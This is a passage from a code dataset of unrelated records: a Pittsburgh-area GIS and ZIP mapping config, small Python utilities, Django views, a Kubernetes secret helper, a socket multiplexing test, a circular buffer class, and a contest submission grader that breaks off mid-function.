\"census_tracts/Allegheny_County_Census_Tracts_2016.shp\",\n \"model\": \"CensusTract\",\n \"mapping\": {\n \"geo_id\": \"GEOID\",\n \"state\": \"STATEFP\",\n \"county\": \"COUNTYFP\",\n \"tract\": \"TRACTCE\",\n \"lsad\": \"LSAD\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"census_block\": {\n \"source\": \"census_blocks/Allegheny_County_Census_Blocks_2016.shp\",\n \"model\": \"CensusBlock\",\n \"mapping\": {\n \"fid\": \"FID\",\n \"state\": \"STATEFP10\",\n \"county\": \"COUNTYFP10\",\n \"tract\": \"TRACTCE10\",\n \"block\": \"BLOCKCE10\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"school_district\": {\n \"source\": \"school_dist/Allegheny_County_School_District_Boundaries.shp\",\n \"model\": \"SchoolDistrict\",\n \"mapping\": {\n \"object_id\": \"OBJECTID\",\n \"district_name\": \"SCHOOLD\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"parcel\": {\n \"source\": \"parcels/untitled_table_24.shp\",\n \"model\": \"Parcel\",\n \"mapping\": {\n \"objectid\": \"objectid\",\n \"pin\": \"pin\",\n \"mapblocklot\": \"mapblocklo\",\n \"shapearea\": \"shapearea\",\n \"shapelen\": \"shapelen\",\n \"addr_number\": \"propertyho\",\n \"addr_fraction\": \"propertyfr\",\n \"addr_street\": \"propertyad\",\n \"addr_city\": \"propertyci\",\n \"addr_state\": \"propertyst\",\n \"addr_unit\": \"propertyun\",\n \"addr_zip\": \"propertyzi\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n\n \"address\": {\n \"source\": \"ac_address_points/Allegheny_County_Address_Points.shp\",\n \"model\": \"AddressPoint\",\n \"mapping\": {\n \"object_id\": \"OBJECTID\",\n \"address_id\": \"ADDRESS_ID\",\n \"street_id\": \"STREET_ID\",\n \"dup_street_id\": \"DUP_STREET\",\n \"address_type\": \"ADDRESS_TY\",\n \"full_address\": \"FULL_ADDRE\",\n \"address_number_prefix\": \"ADDR_NUM_P\",\n \"address_number\": \"ADDR_NUM\",\n \"address_number_suffix\": \"ADDR_NUM_S\",\n \"street_premodifier\": \"ST_PREMODI\",\n \"street_prefix\": \"ST_PREFIX\",\n \"street_pretype\": \"ST_PRETYPE\",\n \"street_name\": \"ST_NAME\",\n \"street_type\": \"ST_TYPE\",\n \"street_postmodifier\": \"ST_POSTMOD\",\n \"unit\": \"UNIT\",\n \"unit_type\": \"UNIT_TYPE\",\n \"floor\": \"FLOOR\",\n \"municipality\": \"MUNICIPALI\",\n \"county\": \"COUNTY\",\n \"state\": \"STATE\",\n \"zip_code\": \"ZIP_CODE\",\n \"zip_code_four\": \"ZIP_CODE4\",\n \"comment\": \"COMMENT\",\n \"edit_date\": \"EDIT_DATE\",\n \"source\": \"SOURCE\",\n \"geom\": \"POINT\"\n }\n }\n}\n\nZIP_MAPPING = {\n \"15003\": {\n \"NAME\": \"AMBRIDGE\"\n },\n \"15005\": {\n \"NAME\": \"BADEN\"\n },\n \"15006\": {\n \"NAME\": \"BAIRDFORD\"\n },\n \"15007\": {\n \"NAME\": \"BAKERSTOWN\"\n },\n \"15014\": {\n \"NAME\": \"BRACKENRIDGE\"\n },\n \"15015\": {\n \"NAME\": \"BRADFORD WOODS\"\n },\n \"15017\": {\n \"NAME\": \"BRIDGEVILLE\"\n },\n \"15018\": {\n \"NAME\": \"BUENA VISTA\"\n },\n \"15020\": {\n \"NAME\": \"BUNOLA\"\n },\n \"15024\": {\n \"NAME\": \"CHESWICK\"\n },\n \"15025\": {\n \"NAME\": \"CLAIRTON\"\n },\n \"15026\": {\n \"NAME\": \"CLINTON\"\n },\n \"15028\": {\n \"NAME\": \"COULTERS\"\n },\n \"15030\": {\n \"NAME\": \"CREIGHTON\"\n },\n \"15031\": {\n \"NAME\": \"CUDDY\"\n },\n \"15034\": {\n \"NAME\": \"DRAVOSBURG\"\n },\n \"15035\": {\n \"NAME\": \"EAST MC KEESPORT\"\n },\n \"15037\": {\n \"NAME\": \"ELIZABETH\"\n },\n \"15044\": {\n \"NAME\": \"GIBSONIA\"\n },\n \"15045\": {\n \"NAME\": \"GLASSPORT\"\n },\n \"15046\": {\n \"NAME\": \"CRESCENT\"\n },\n \"15047\": {\n \"NAME\": \"GREENOCK\"\n },\n \"15049\": {\n \"NAME\": \"HARWICK\"\n },\n \"15051\": {\n \"NAME\": \"INDIANOLA\"\n },\n \"15056\": {\n \"NAME\": \"LEETSDALE\"\n },\n \"15057\": {\n \"NAME\": \"MC DONALD\"\n },\n \"15063\": {\n \"NAME\": \"MONONGAHELA\"\n },\n \"15064\": {\n \"NAME\": \"MORGAN\"\n },\n \"15065\": {\n \"NAME\": \"NATRONA HEIGHTS\"\n },\n \"15068\": {\n \"NAME\": \"NEW KENSINGTON\"\n },\n \"15071\": {\n \"NAME\": \"OAKDALE\"\n },\n \"15075\": {\n \"NAME\": \"RURAL RIDGE\"\n },\n \"15076\": {\n \"NAME\": \"RUSSELLTON\"\n },\n \"15082\": {\n \"NAME\": \"STURGEON\"\n },\n \"15083\": {\n \"NAME\": \"SUTERSVILLE\"\n },\n \"15084\": {\n \"NAME\": \"TARENTUM\"\n },\n \"15085\": {\n \"NAME\": \"TRAFFORD\"\n },\n \"15086\": {\n \"NAME\": \"WARRENDALE\"\n },\n \"15088\": {\n \"NAME\": \"WEST ELIZABETH\"\n },\n \"15089\": {\n \"NAME\": \"WEST NEWTON\"\n },\n \"15090\": {\n \"NAME\": \"WEXFORD\"\n },\n \"15101\": {\n \"NAME\": \"ALLISON PARK\"\n },\n \"15102\": {\n \"NAME\": \"BETHEL PARK\"\n },\n \"15104\": {\n \"NAME\": \"BRADDOCK\"\n },\n \"15106\": {\n \"NAME\": \"CARNEGIE\"\n },\n \"15108\": {\n \"NAME\": \"CORAOPOLIS\"\n },\n \"15110\": {\n \"NAME\": \"DUQUESNE\"\n },\n \"15112\": {\n \"NAME\": \"EAST PITTSBURGH\"\n },\n \"15116\": {\n \"NAME\": \"GLENSHAW\"\n },\n \"15120\": {\n \"NAME\": \"HOMESTEAD\"\n },\n \"15122\": {\n \"NAME\": \"WEST MIFFLIN\"\n },\n \"15126\": {\n \"NAME\": \"IMPERIAL\"\n },\n \"15129\": {\n \"NAME\": \"SOUTH PARK\"\n },\n \"15131\": {\n \"NAME\": \"MCKEESPORT\"\n },\n \"15132\": {\n \"NAME\": \"MCKEESPORT\"\n },\n \"15133\": {\n \"NAME\": \"MCKEESPORT\"\n },\n \"15135\": {\n \"NAME\": \"MCKEESPORT\"\n },\n \"15136\": {\n \"NAME\": \"MC KEES ROCKS\"\n },\n \"15137\": {\n \"NAME\": \"NORTH VERSAILLES\"\n },\n \"15139\": {\n \"NAME\": \"OAKMONT\"\n },\n \"15140\": {\n \"NAME\": \"PITCAIRN\"\n },\n \"15142\": {\n \"NAME\": \"PRESTO\"\n },\n \"15143\": {\n \"NAME\": \"SEWICKLEY\"\n },\n \"15144\": {\n \"NAME\": \"SPRINGDALE\"\n },\n \"15145\": {\n \"NAME\": \"TURTLE CREEK\"\n },\n \"15146\": {\n \"NAME\": \"MONROEVILLE\"\n },\n \"15147\": {\n \"NAME\": \"VERONA\"\n },\n \"15148\": {\n \"NAME\": \"WILMERDING\"\n },\n \"15201\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15202\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15203\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15204\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15205\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15206\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15207\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15208\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15209\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15210\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15211\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15212\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15213\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15214\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15215\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15216\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15217\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15218\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15219\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15220\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15221\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15222\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15223\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15224\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15225\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15226\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15227\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15228\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15229\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15232\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15233\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15234\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15235\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15236\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15237\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15238\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15239\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15241\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15243\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15261\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15275\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15276\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15282\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15290\": {\n \"NAME\": \"PITTSBURGH\"\n },\n \"15321\": {\n \"NAME\": \"CECIL\"\n },\n \"15332\": {\n \"NAME\": \"FINLEYVILLE\"\n },\n \"15642\": {\n \"NAME\": \"IRWIN\"\n },\n \"15668\": {\n \"NAME\": \"MURRYSVILLE\"\n },\n \"16046\": {\n \"NAME\": \"MARS\"\n },\n \"16055\": {\n \"NAME\": \"SARVER\"\n },\n \"16056\": {\n \"NAME\": \"SAXONBURG\"\n },\n \"16059\": {\n \"NAME\": \"VALENCIA\"\n },\n \"16229\": {\n \"NAME\": \"FREEPORT\"\n }\n}\n","sub_path":"data_collection/collection_settings.py","file_name":"collection_settings.py","file_ext":"py","file_size_in_byte":14495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"553782225","text":"largura = int(input(\"Digite a largura: \"))\naltura = int(input(\"Digite a altura: \"))\n\ndef Quadrado(altura, largura, simbolo = '#', preenchimento = ' '):\n print(simbolo * largura)\n for _ in range(altura-2):\n print('{}{}{}'.format(simbolo, preenchimento * (largura - 2), simbolo))\n print(simbolo * largura)\n\nQuadrado(altura, largura)\n","sub_path":"imprime_retangulo_vazado.py","file_name":"imprime_retangulo_vazado.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"631113348","text":"\n# coding: utf-8\n\n# In[1]:\n\n\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport webbrowser\n\ndef openff():\n # This def open firefox browser.\n Jpsen = input(\"英語にしたい日本語を入力してください: \")\n url = \"https://script.google.com/macros/s/AKfycby_dU9RymFwgEsd6txZAhA68MQAnUQxXeRnbVia_V0U8fv-Gkoy/exec?text=\" + Jpsen + \"&source=ja&target=en\"\n browser = webbrowser.get('chrome')\n browser.open(url)\n\n r = r = requests.get(url)\n soup = BeautifulSoup(r.content, \"html.parser\")\n soup.find_all\n\nopenff()\n\n","sub_path":"JP_EN.py","file_name":"JP_EN.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"631263569","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 14 10:27:34 2017\n@author: Thautwarm\n\"\"\"\nfrom .config.classDefine import class_info,class_type_map\nfrom copy import deepcopy\ndef giveType(keyname):\n for type_map_key in class_type_map:\n for sign in class_type_map[type_map_key]:\n if sign in keyname.lower() :\n return type_map_key\n return \"varchar(255)\"\n\nclass makeEntity:\n def __init__(self,init,name=None):\n if name:\n self.table=name\n if type(init) in [tuple,list]: #定义一个Entity\n self.typemap=dict()\n for i in init:\n self.__setattr__(i,None)\n self.typemap[i]=giveType(i)\n self.attrs=set(init)\n elif type(init)==dict: #集成所有Entity\n for i in init:\n self.__setattr__(i,init[i])\n self.attrs=set(init)\n def toMap(self):\n maps=dict()\n for attr in self.attrs:\n value=self[attr]\n if value:\n maps[attr]=value\n return maps\n def __call__(self,**attrValues):\n if attrValues:\n ret=deepcopy(self)\n ret.__init__(attrValues)\n return ret\n \n return deepcopy(self)\n def get(self,key):\n return self.__getattribute__(key)\n def set(self,key,value):\n if key in self.attrs:\n self.__setattr__(key,value)\n def __getitem__(self,key):\n return self.__getattribute__(key)\n \nentities=makeEntity( dict( \n [ (config_i['class'], makeEntity(config_i['attrs'],name=config_i['class'])) for config_i in class_info ]\n ) )\n \n \n \n \n ","sub_path":"entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"298983514","text":"# coding: utf-8\n\nimport json\nfrom pprint import pprint\nfrom kubernetes import client, config\n\nimport apis.t3q_secret as t3q_secret\n\ndef create(Resource):\n if Resource['type'] == 'docker':\n fn = t3q_secret.create_docker_secret\n else:\n fn = t3q_secret.create_git_secret\n fn(\n Resource['name'],\n Resource['site'],\n Resource['user'],\n Resource['passwd'])\n\ndef delete(Resource):\n t3q_secret.delete_secret(Resource['name'])\n\ndef list():\n secrets = t3q_secret.list_secret()\n res = []\n for s in secrets.items:\n anno = s.metadata.annotations\n site = []\n for key in anno:\n site.append({'name':key, 'value':anno[key]})\n res.append({\n 'name': s.metadata.name,\n 'site': site,\n 'type': s.type,\n })\n return res\n","sub_path":"dashboard/t3q_dash_secret.py","file_name":"t3q_dash_secret.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"206092655","text":"from django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import render, get_object_or_404\n\nfrom .models import News, Tag, Ip\n\nUser = get_user_model()\n\n\ndef get_client_ip(request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n return ip\n\n\ndef index(request):\n news_list = News.objects.all()\n paginator = Paginator(news_list, settings.PAGE_SIZE)\n page_number = request.GET.get('page')\n page = paginator.get_page(page_number)\n context = {\n 'page': page,\n }\n return render(request, 'news/index.html', context)\n\n\ndef news_view(request, item_id):\n item = get_object_or_404(News, pk=item_id)\n ip = get_client_ip(request)\n if Ip.objects.filter(ip=ip).exists():\n item.views.add(Ip.objects.get(ip=ip))\n else:\n Ip.objects.create(ip=ip)\n item.views.add(Ip.objects.get(ip=ip))\n context = {\n 'item': item,\n }\n return render(request, 'news/news.html', context)\n\n\ndef tag_news(request, slug):\n tag = get_object_or_404(Tag, slug=slug)\n news_list = tag.news.all()\n paginator = Paginator(news_list, settings.PAGE_SIZE)\n page_number = request.GET.get('page')\n page = paginator.get_page(page_number)\n context = {\n 'tag': tag,\n 'page': page\n }\n return render(request, 'news/tag.html', context)\n\n\ndef statistics(request):\n news_list = News.objects.all()\n paginator = Paginator(news_list, settings.PAGE_SIZE)\n page_number = request.GET.get('page')\n page = paginator.get_page(page_number)\n context = {\n 'page': page,\n }\n return render(request, 'news/statistics.html', context)\n","sub_path":"news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"75237495","text":"import time\nfrom threading import Thread\n\nfrom bxutils import logging\n\nfrom bxcommon.test_utils.abstract_test_case import AbstractTestCase\nfrom bxcommon.connections.abstract_node import AbstractNode\nfrom bxcommon.connections.node_type import NodeType\nfrom bxcommon.network.network_event_loop_factory import create_event_loop\nfrom bxcommon.test_utils import helpers\nfrom bxcommon.test_utils.helpers import generate_bytearray\n\nlogger = logging.get_logger(__name__)\n\n\nclass TestNode(AbstractNode):\n def __init__(self, port, peers_ports, timeout=None, send_bytes=None):\n opts = helpers.get_common_opts(port)\n super(TestNode, self).__init__(opts)\n\n self.port = port\n self.peers_ports = peers_ports\n self.timeout = timeout\n\n self.initialized = False\n self.closed = False\n self.finished_sending = True\n self.ready_to_close = False\n\n self.connections = []\n\n self.send_bytes = send_bytes if send_bytes is not None else bytearray(0)\n self.memory_view = memoryview(self.send_bytes)\n self.bytes_sent = 0\n\n self.receive_buffers = {}\n\n self.timeout_triggered_loops = 0\n\n def send_request_for_relay_peers(self):\n pass\n\n def get_outbound_peer_addresses(self):\n peer_addresses = []\n\n for peer_port in self.peers_ports:\n peer_addresses.append(('0.0.0.0', peer_port))\n\n return peer_addresses\n\n def build_connection(self, socket_connection, ip, port, from_me=False):\n return None\n\n def on_connection_added(self, socket_connection, port, ip, from_me):\n fileno = socket_connection.fileno()\n print(\"Node {0}: Add_connection call. Fileno {1}\".format(self.port, fileno))\n self.connections.append((socket_connection, socket_connection.fileno(), port, ip, from_me))\n self.receive_buffers[fileno] = bytearray(0)\n\n def on_connection_initialized(self, fileno):\n self.initialized = True\n\n def on_connection_closed(self, fileno, should_retry):\n print(\"Node {0}: on_connection_closed call. Fileno {1}\".format(self.port, fileno))\n self.ready_to_close = True\n\n def get_bytes_to_send(self, fileno):\n print(\"Node {0}: get_bytes_to_send call. Fileno {1}\".format(self.port, fileno))\n if self.bytes_sent >= len(self.send_bytes):\n logger.debug(\"All bytes sent. Total bytes sent {0}\".format(len(self.send_bytes)))\n self.finished_sending = True\n\n return self.memory_view[self.bytes_sent:]\n\n def on_bytes_sent(self, fileno, bytes_sent):\n print(\"Node {0}: on_bytes_sent call. Fileno {1}. bytes sent {2}\"\n .format(self.port, fileno, bytes_sent))\n self.bytes_sent += bytes_sent\n\n if len(self.send_bytes) == self.bytes_sent:\n self.ready_to_close = True\n\n def on_bytes_received(self, fileno: int, bytes_received: bytearray):\n print(\"Node {0}: on_bytes_received call. {1} bytes received from connection {2}\"\n .format(self.port, len(bytes_received), fileno))\n self.receive_buffers[fileno] += bytes_received\n\n def get_sleep_timeout(self, triggered_by_timeout, first_call=False):\n print(\"Node {0}: get_sleep_timeout called.\".format(self.port))\n\n if triggered_by_timeout:\n self.timeout_triggered_loops += 1\n return self.timeout\n\n def force_exit(self):\n print(\"Node {0}: force_exit call. Exit: {1}\".format(self.port, self.ready_to_close))\n return self.ready_to_close\n\n def close(self):\n print(\"Node {0}: Close call.\".format(self.port))\n self.closed = True\n\n def on_input_received(self, file_no: int) -> bool:\n return True\n\n\nclass MultiplexingTest(AbstractTestCase):\n\n def test_multiplexing__send(self):\n receiver_node = TestNode(8001, [], 0.01)\n receiver_event_loop = create_event_loop(receiver_node)\n receiver_thread = Thread(target=receiver_event_loop.run)\n\n send_bytes = generate_bytearray(1000)\n\n sender_node = TestNode(8002, [8001], None, send_bytes)\n sender_event_loop = create_event_loop(sender_node)\n\n try:\n print(\"Starting event loop on receiver\")\n receiver_thread.start()\n\n # let receiver run for 0.1 sec, more than timeout time\n time.sleep(0.1)\n\n sender_event_loop.run()\n\n receiver_thread.join()\n\n self._validate_successful_run(send_bytes, sender_node, receiver_node, sender_event_loop,\n receiver_event_loop)\n\n # verify that sender does not have any timeout triggered loops and receiver does\n self.assertEqual(sender_node.timeout_triggered_loops, 0)\n self.assertTrue(receiver_node.timeout_triggered_loops > 0)\n finally:\n if receiver_thread.is_alive():\n receiver_thread.join()\n\n receiver_event_loop.close()\n sender_event_loop.close()\n\n def test_multiplexing__delayed_connect(self):\n receiver_port = helpers.get_free_port()\n receiver_node = TestNode(receiver_port, [], 0.01)\n receiver_event_loop = create_event_loop(receiver_node)\n receiver_thread = Thread(target=receiver_event_loop.run)\n\n send_bytes = generate_bytearray(1000)\n\n sender_port = helpers.get_free_port()\n sender_node = TestNode(sender_port, [], 0.01, send_bytes)\n sender_event_loop = create_event_loop(sender_node)\n sender_thread = Thread(target=sender_event_loop.run)\n\n try:\n print(\"Starting event loop on receiver\")\n receiver_thread.start()\n\n print(\"Starting event loop on sender\")\n sender_thread.start()\n\n # let threads run for 0.1 sec\n time.sleep(0.1)\n\n self.assertEqual(len(receiver_node.connections), 0)\n self.assertEqual(len(sender_node.connections), 0)\n\n # request connection while clients are running\n sender_node.enqueue_connection('0.0.0.0', receiver_node.port)\n\n receiver_thread.join()\n sender_thread.join()\n\n self._validate_successful_run(send_bytes, sender_node, receiver_node, sender_event_loop,\n receiver_event_loop)\n finally:\n if receiver_thread.is_alive():\n receiver_thread.join()\n\n if sender_thread.is_alive():\n sender_thread.join()\n\n receiver_event_loop.close()\n sender_event_loop.close()\n\n def test_multiplexing__disconnect(self):\n receiver_port = helpers.get_free_port()\n receiver_node = TestNode(receiver_port, [], 0.01)\n receiver_event_loop = create_event_loop(receiver_node)\n receiver_thread = Thread(name=\"receiver\", target=receiver_event_loop.run)\n\n sender_port = helpers.get_free_port()\n sender_node = TestNode(sender_port, [receiver_port], 0.01)\n sender_event_loop = create_event_loop(sender_node)\n sender_thread = Thread(name=\"sender\", target=sender_event_loop.run)\n\n try:\n print(\"Starting event loop on receiver\")\n receiver_thread.start()\n sender_thread.start()\n\n # let threads run for 0.1 sec\n time.sleep(0.1)\n\n self.assertEqual(len(receiver_node.connections), 1)\n self.assertEqual(len(sender_node.connections), 1)\n\n # request disconnect while clients are running\n sender_node.enqueue_disconnect(sender_node.connections[0][0], False)\n\n # sender and receiver have to disconnect and exit\n receiver_thread.join()\n sender_thread.join()\n finally:\n if receiver_thread.is_alive():\n receiver_thread.join()\n\n if sender_thread.is_alive():\n sender_thread.join()\n\n receiver_event_loop.close()\n sender_event_loop.close()\n\n def _validate_successful_run(self, send_bytes, sender_node, receiver_node, sender_event_loop, receiver_event_loop):\n self.assertTrue(sender_node.bytes_sent, len(send_bytes))\n\n self.assertTrue(len(sender_node.connections), 1)\n self.assertTrue(len(sender_event_loop._socket_connections), 1)\n self.assertEqual(sender_node.connections[0][2], '0.0.0.0')\n self.assertEqual(sender_node.connections[0][3], receiver_node.port)\n self.assertEqual(sender_node.connections[0][4], True)\n\n self.assertTrue(len(receiver_node.connections), 1)\n self.assertTrue(len(receiver_event_loop._socket_connections), 1)\n self.assertEqual(receiver_node.connections[0][2], '127.0.0.1')\n self.assertEqual(receiver_node.connections[0][4], False)\n\n bytes_received = receiver_node.receive_buffers[receiver_node.connections[0][1]]\n self.assertEqual(bytes_received, send_bytes)\n\n self.assertTrue(sender_node.force_exit())\n self.assertTrue(receiver_node.force_exit)\n self.assertTrue(sender_node.closed)\n self.assertTrue(receiver_node.closed)\n self.assertTrue(sender_node.initialized)\n self.assertTrue(receiver_node.initialized)\n","sub_path":"test/integration/network/test_multiplexing.py","file_name":"test_multiplexing.py","file_ext":"py","file_size_in_byte":9180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"296437398","text":"#!/usr/bin/env python\n#coding: utf-8\n\nimport random, math\n\n\nclass TSCircularBuffer():\n '''A circular buffer that stores items and associated relative log-likelihood of reads on them.\n Allows picking random items based on these likelihoods. TSCircularBuffer gives O(1) amortized performance on inserts,\n O(1) on indexed reads and O(logN) performance for random reads where N is the size of the buffer.'''\n\n def __init__(self, size):\n '''Initialize storage structures and state variables.'''\n \n self._data = dict()\n self._cum_prob = list()\n \n self._size = size\n self._cursor = 0\n self._rolled_over_once = False\n \n # These variables help guarantee performance without causing numerical overflow in probability values.\n self._prob_zero = 0\n self._exp_zero = 0\n \n \n def insert(self, item, log_prob):\n '''Insert an item item into the buffer.'''\n \n # Record the zero error in the cumulative probabilities.\n if self._rolled_over_once:\n self._prob_zero = self._cum_prob[self._cursor]\n \n self._data[self._cursor] = item\n \n if self._rolled_over_once:\n self._cum_prob[self._cursor] = self._cum_prob[self._cursor-1] + math.exp(log_prob - self._exp_zero)\n elif self._cursor != 0:\n self._cum_prob.append(self._cum_prob[self._cursor-1] + math.exp(log_prob))\n else:\n self._cum_prob.append(math.exp(log_prob))\n \n self._cursor += 1\n if self._cursor == self._size:\n \n # Capture rollover, reset cursor and adjust cumulative probability values\n self._rolled_over_once = True\n self._cursor = 0\n self._adjustSums()\n \n \n def _adjustSums(self):\n '''Adjust cumulative probability values based on the last-written item's log-likelihood. This periodic step\n ensures that probabilities will not blow up during long runs.'''\n \n # Calculate the probability of the last-written item and set a new 'zero' value for future log-likelihoods.\n ratio = self._cum_prob[-1] - self._cum_prob[-2]\n self._exp_zero = math.log(ratio)\n \n # Divide existing cumulative probability values and their zero error by the probability of the last item.\n for index in xrange(self._size):\n self._cum_prob[index] /= ratio\n self._prob_zero /= ratio\n \n \n def rand(self):\n '''Returns a random item from buffer based on probabilities derived from the log-likelihoods associated with items.'''\n \n if not self._rolled_over_once and self._cursor == 0:\n return None\n \n # Calculate a cumulative probability threshold to search for taking into account the zero error\n threshold = random.random() * (self._cum_prob[self._cursor - 1] - self._prob_zero) + self._prob_zero\n \n return self._thresholdItem(threshold)\n \n \n def _thresholdItem(self, threshold):\n '''Performs a binary search to find the item such that threshold lies in the cumulative probability range specified by the item.'''\n \n begin = self._cursor - self._size if self._rolled_over_once else 0\n end = self._cursor - 1\n \n while begin != end:\n mid = (begin + end) / 2\n \n if self._cum_prob[mid] < threshold:\n begin = mid + 1\n else:\n end = mid\n \n return self[begin]\n \n \n def __getitem__(self, index):\n '''Item-getter for indexed reads.'''\n \n return self._data[index % self._size]\n\n\n","sub_path":"chirp/ts_circular_buffer.py","file_name":"ts_circular_buffer.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"430116496","text":"import os\nimport json\nimport tarfile\nfrom timeit import default_timer as timer\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\n\nfrom celery import shared_task\n\nfrom . import models\n\n\n################################### SUBMISSSIONS\n\ndef SaveTaskSubmission(code, user, task):\n code = code.replace('\\r\\n', '\\n')\n submission = models.ContestTaskSubmission(task=task, author=user, code=code)\n\n task_tests = models.ContestTaskTest.objects.filter(task=task)\n ttests =[]\n for ttest in task_tests:\n ttests.append(models.ContestTaskSubmissionTest(submit=submission, test=ttest))\n \n # Save everything\n submission.save()\n for a in ttests:\n a.save()\n # Call celery\n RunSubmission.apply_async(args=[submission.id])\n\n@shared_task\ndef RunSubmission(submission_id):\n submission = models.ContestTaskSubmission.objects.get(pk=submission_id)\n submission_path = os.path.join(submission.task.path, str(submission.special_id))\n submission_tests = models.ContestTaskSubmissionTest.objects.filter(submit=submission)\n correct = 0\n\n try:\n source_path = SaveSubmissionCode(submission_path, submission.code)\n\n submission.score = 0\n for stest in submission_tests:\n return_val = RunSubmissionTest(stest, source_path, submission_path)\n if return_val == 4:\n correct += 1\n for stest in submission_tests:\n if stest.score >= 0:\n submission.score += stest.score\n if correct == len(submission_tests):\n submission.result = 4\n elif correct == 0:\n submission.result = 2\n else:\n submission.result = 3\n except Exception as e:\n print('[ERROR]', e, '[END_SUBMISSION_ERROR]')\n submission.result = 1\n submission.score = -1\n submission.save()\n\ndef RunSubmissionTest(stest, source_path, submission_path):\n return_code = EvalSubmissionTest(stest, source_path, submission_path)\n\n if return_code == 0:\n test_result = 4\n elif return_code == -1:\n test_result = 2\n elif return_code == -2:\n test_result = 3\n else:\n test_result = 1\n\n stest.result = test_result\n stest.save()\n\n return test_result\n\ndef EvalSubmissionTest(stest, source_path, submission_path):\n input_path = os.path.join(stest.test.path, 'input.in')\n expected_output_path = os.path.join(stest.test.path, 'output.out') \n output_path = os.path.join(submission_path, str(stest.test.ord_id) + '_output.out')\n\n run_command = f\"timeout --preserve-status {stest.test.task.timelimit + 1}s {settings.EDLANG_BINARY} {source_path} < {input_path} > {output_path}\"\n check_command = f\"diff -B -Z -E --strip-trailing-cr {expected_output_path} {output_path} > /dev/null\"\n start = timer()\n run_return = os.system(run_command)\n end = timer()\n time_spent = end - start\n if time_spent > stest.test.task.timelimit:\n stest.score = 0\n os.system(f\"rm {output_path}\")\n return -1\n if run_return:\n os.system(f\"rm {output_path}\")\n return run_return\n check_return = os.system(check_command)\n os.system(f\"rm {output_path}\")\n if check_return:\n stest.score = 0\n return -2\n stest.score = 1\n return 0\n\ndef SaveSubmissionCode(path, code):\n os.makedirs(path, exist_ok=True)\n source_path = os.path.join(path, 'source.ed')\n with open(source_path, 'w+', encoding='utf-8') as f:\n f.write(code)\n\n return source_path\n\n################################### TASK_PCAKAGES\n\ndef UploadContestTaskPackage(package, user, contest):\n contest_path = os.path.join(settings.CONTESTS_DIR, str(contest.special_id))\n contest_task_package_path = SaveContestTaskPackage(package, contest_path)\n\n IntermidiateTask.apply_async(args=(user.id, contest_task_package_path, contest.id))\n\n@shared_task\ndef 